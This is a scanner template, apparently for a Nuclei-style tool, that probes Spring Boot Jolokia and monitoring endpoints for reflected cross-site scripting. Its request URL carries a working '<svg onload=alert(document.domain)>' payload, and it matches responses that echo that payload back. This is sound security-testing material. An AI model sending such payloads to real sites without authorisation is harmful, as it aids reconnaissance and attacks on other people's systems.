id: jolokia-xss
info:
  name: Spring Jolokia XSS
  risk: High

params:
  - dest: localhost:9092
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'actuator, api, admin, eureka'

variables:
  - vul: |
      /jolokia/
      /monitoring/json/
requests:
  # xss
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.vul}}read<svg%20onload=alert(document.domain)>?mimeType=text/html
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("resHeaders", 'Content-Type: text/html') && StringSearch("body", '<svg onload=alert(document.domain)>') && StringSearch("body", 'java.lang.')

references:
  - link: https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
  - tool: https://github.com/LandGrey/SpringBootVulExploit
